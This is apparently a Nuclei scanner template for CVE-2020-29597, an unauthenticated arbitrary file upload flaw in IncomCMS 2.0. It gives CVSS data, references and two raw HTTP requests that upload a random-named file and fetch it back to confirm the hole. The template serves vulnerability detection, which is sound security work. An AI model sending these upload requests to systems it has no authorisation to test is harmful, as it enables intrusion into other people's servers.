id: CVE-2020-29597

info:
  name: IncomCMS 2.0 - Arbitrary File Upload
  author: princechaddha
  severity: critical
  description: |
    IncomCMS 2.0 has an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
  remediation: |
    Apply the latest security patch or update to a version that addresses the vulnerability.
  reference:
    - https://github.com/Trhackno/CVE-2020-29597
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29597
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
    - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29597
    cwe-id: CWE-434
    epss-score: 0.81807
    epss-percentile: 0.98005
    cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incomcms_project
    product: incomcms
  tags: cve,cve2020,incomcms,fileupload,intrusive

http:
  - raw:
      - |
        POST /incom/modules/uploader/showcase/script.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt

        ------WebKitFormBoundaryBEJZt0IK73M2mAbt
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
        Content-Type: text/html

        {{randstr_2}}
        ------WebKitFormBoundaryBEJZt0IK73M2mAbt--
      - |
        GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{"status":"1","name":"{{randstr_1}}.png"}'

      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'
# digest: 4a0a004730450220553e0180e56a2414ee70784168a0b064400f37cee96fec21c0a8e05daac4566a022100f9a8a89aefd2deaecc23a8df79723e4f5d93f1db4de0164ba85c0f36603dc59f:922c64590222798bb761d5b6d8e72950